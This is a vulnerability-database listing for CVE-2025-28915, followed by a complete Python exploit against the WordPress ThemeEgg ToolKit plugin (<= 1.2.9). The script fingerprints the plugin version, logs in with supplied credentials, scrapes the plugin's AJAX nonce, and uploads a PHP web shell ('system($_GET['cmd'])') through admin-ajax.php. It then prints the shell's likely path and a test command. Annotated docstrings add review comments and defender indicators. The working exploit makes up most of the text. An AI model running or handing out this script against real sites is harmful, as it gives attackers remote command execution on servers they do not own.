| Reporter | Title | Published | Views | Family (All 12) |
|---|---|---|---|---|
| Exploit for CVE-2025-28915 | 14 Mar 2025 09:30 | – | githubexploit | |
| Exploit for CVE-2025-28915 | 12 Mar 2025 03:23 | – | githubexploit | |
| CVE-2025-28915 | 11 Mar 2025 22:40 | – | circl | |
| WordPress plugin ThemeEgg ToolKit 代码问题漏洞 | 11 Mar 2025 00:00 | – | cnnvd | |
| CVE-2025-28915 | 11 Mar 2025 21:01 | – | cve | |
| CVE-2025-28915 WordPress ThemeEgg ToolKit plugin <= 1.2.9 - Arbitrary File Upload vulnerability | 11 Mar 2025 21:01 | – | cvelist | |
| CVE-2025-28915 | 11 Mar 2025 21:15 | – | nvd | |
| WordPress ThemeEgg ToolKit 1.2.9 Shell Upload | 12 Mar 2025 00:00 | – | packetstormnews | |
| WordPress ThemeEgg ToolKit plugin <= 1.2.9 - Arbitrary File Upload vulnerability | 11 Mar 2025 21:46 | – | patchstack | |
| CVE-2025-28915 | 13 Mar 2025 21:57 | – | redhatcve | |
import argparse
import re
import time
import requests
from bs4 import BeautifulSoup
#by Nxploit | Khaled Alenazi
# Module-level HTTP setup shared by login()/get_security_nonce()/exploit():
# urllib3's InsecureRequestWarning is silenced and certificate verification is
# switched off for the whole session, so every request made through `session`
# accepts any TLS certificate (check_version() additionally passes verify=False
# to a bare requests.get()).
requests.packages.urllib3.disable_warnings()
session = requests.Session()
session.verify = False
def display_banner() -> None:
    """Print the ASCII-art banner and author line to stdout.

    Purely cosmetic; it has no effect on the rest of the run.
    """
    banner = """
..######..##.....##.########..........#######....#####....#######..########..........#######...#######...#######.....##...########
.##....##.##.....##.##...............##.....##..##...##..##.....##.##...............##.....##.##.....##.##.....##..####...##......
.##.......##.....##.##......................##.##.....##........##.##......................##.##.....##.##.....##....##...##......
.##.......##.....##.######...#######..#######..##.....##..#######..#######..#######..#######...#######...########....##...#######.
.##........##...##..##...............##........##.....##.##..............##.........##........##.....##........##....##.........##
.##....##...##.##...##...............##.........##...##..##........##....##.........##........##.....##.##.....##....##...##....##
..######.....###....########.........#########...#####...#########..######..........#########..#######...#######...######..######.
Exploit by : Khaled Alenazi ,Nxploit
"""
    print(banner)
def check_version(url: str) -> bool:
    """Fingerprint the installed plugin version from its public readme.txt.

    Issues an unauthenticated GET to
    ``<url>/wp-content/plugins/themeegg-toolkit/readme.txt`` (bypassing the
    module-level session) and reads the ``Stable tag:`` line.

    Returns:
        True when a tag is found and compares as <= "1.2.9"; False on any other
        outcome, including a non-200 response or a missing tag.

    NOTE(review): the comparison is a plain string comparison, not a semantic
    version comparison, so tags with multi-digit components (e.g. "1.2.10" or
    "1.10.0") can be classified either way — treat the result as a heuristic.

    Defender note: this readme.txt fetch is the first request the script makes,
    so it precedes any login or upload attempt in the access log.
    """
    version_url = f"{url}/wp-content/plugins/themeegg-toolkit/readme.txt"
    response = requests.get(version_url, headers={"User-Agent": "Mozilla/5.0"}, verify=False)
    if response.status_code == 200:
        match = re.search(r'Stable tag: (\d+\.\d+\.\d+)', response.text)
        if match and match.group(1) <= "1.2.9":
            print(f"[+] Vulnerable version detected: {match.group(1)}")
            # Fixed pause before continuing; no functional purpose is visible here.
            time.sleep(3)
            return True
    print("[-] The target does not appear to be vulnerable.")
    return False
def login(url: str, username: str, password: str, session) -> bool:
    """Authenticate against wp-login.php using the supplied credentials.

    Posts the standard WordPress login form fields and reports success solely
    by checking whether the session's cookie jar now holds a cookie whose name
    contains ``wordpress_logged_in``. The HTTP response itself is assigned but
    never inspected. Valid credentials are therefore a hard prerequisite for
    everything that follows — the upload in exploit() is an authenticated action.

    Args:
        url: Base URL of the WordPress site.
        username: WordPress account name.
        password: Password for that account.
        session: A requests.Session that will receive the auth cookies.

    Returns:
        True if a ``wordpress_logged_in`` cookie is present after the POST.
    """
    login_url = f"{url}/wp-login.php"
    login_data = {"log": username, "pwd": password, "rememberme": "forever", "wp-submit": "Log In"}
    response = session.post(login_url, data=login_data, headers={"User-Agent": "Mozilla/5.0"}, verify=False)
    return any('wordpress_logged_in' in cookie.name for cookie in session.cookies)
def get_security_nonce(url: str, session) -> str | None:
    """Extract the plugin's AJAX nonce from its wp-admin settings page.

    Loads ``<url>/wp-admin/themes.php?page=themeegg-toolkit`` with the
    authenticated session, then scans every inline ``<script>`` for a
    ``"ajax_nonce":"<value>"`` fragment (``\\w+`` characters only).

    Returns:
        The first matching nonce value, or None if no script contains one
        (e.g. the page did not render because the session is not logged in).
    """
    settings_page = session.get(f"{url}/wp-admin/themes.php?page=themeegg-toolkit", headers={"User-Agent": "Mozilla/5.0"})
    soup = BeautifulSoup(settings_page.text, "html.parser")
    for script in soup.find_all("script"):
        match = re.search(r'"ajax_nonce":"(\w+)"', script.text)
        if match:
            return match.group(1)
    return None
def exploit(url: str, username: str, password: str) -> None:
    """Run the full chain: version check, login, nonce extraction, file upload.

    Each step prints a status line and returns early on failure:
      1. check_version(url) must report the plugin as <= 1.2.9.
      2. login() must leave a ``wordpress_logged_in`` cookie in the module-level
         session (valid credentials required).
      3. get_security_nonce() must find the plugin's ``ajax_nonce``.
      4. A multipart POST to ``<url>/wp-admin/admin-ajax.php`` with
         ``action=TETK_import_demo_data`` sends a ``.php`` file in the
         ``customizer_file`` field.

    Success is judged only by an HTTP 200 from admin-ajax.php, and the printed
    location is assembled from a hard-coded ``2025/03`` upload directory, so
    neither output line proves the file was actually written.

    Defender notes, derived from the requests this function makes: the
    distinguishing event is a multipart POST to /wp-admin/admin-ajax.php with
    action=TETK_import_demo_data carrying a ``.php`` filename, preceded by a GET
    of the plugin readme.txt and of themes.php?page=themeegg-toolkit by an
    authenticated user. Sites running ThemeEgg ToolKit <= 1.2.9 (the range named
    in the CVE-2025-28915 advisory titles on this page) should update, and
    wp-content/uploads should be reviewed for executable .php files.
    """
    if not check_version(url):
        return
    if login(url, username, password, session):
        print("[+] Logged in successfully.")
    else:
        print("[-] Failed to log in.")
        return
    nonce_value = get_security_nonce(url, session)
    if not nonce_value:
        print("[-] Failed to extract security nonce.")
        return
    print(f"[+] Found security nonce: {nonce_value}")
    shell_code = "<?php system($_GET['cmd']); ?>"
    # Multipart form: two plain fields (action, security nonce) plus the file
    # part; the tuple form (filename, content, content-type) is how requests
    # encodes each field.
    files = {
        "action": (None, "TETK_import_demo_data"),
        "security": (None, nonce_value),
        "customizer_file": ("shell.php", shell_code, "application/x-php")
    }
    upload_url = f"{url}/wp-admin/admin-ajax.php"
    print("[*] Uploading Web Shell...")
    response = session.post(upload_url, files=files, headers={"User-Agent": "Mozilla/5.0"}, verify=False)
    # Fixed pause; no functional purpose is visible here.
    time.sleep(3)
    if response.status_code == 200:
        print("[+] Web Shell uploaded successfully!")
        # Guessed path: year/month are hard-coded, not read from the response.
        shell_path = f"{url}/wp-content/uploads/2025/03/shell.php"
        print(f"[+] Potential Web Shell location: {shell_path}")
        print(f"[*] Test command: {shell_path}?cmd=id")
    else:
        print("[-] File upload failed. Check if you have sufficient privileges or if there are additional protections.")
if __name__ == "__main__":
    # CLI entry point: show the banner, require -u/--url, -un/--username and
    # -p/--password, then hand them to exploit().
    # NOTE(review): the password is taken as a command-line argument, so it is
    # visible in process listings and shell history.
    display_banner()
    parser = argparse.ArgumentParser(description="Exploit for ThemeEgg ToolKit File Upload Vulnerability")
    parser.add_argument("-u", "--url", required=True, help="Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)")
    parser.add_argument("-un", "--username", required=True, help="WordPress username")
    parser.add_argument("-p", "--password", required=True, help="WordPress password")
    args = parser.parse_args()
    exploit(args.url, args.username, args.password)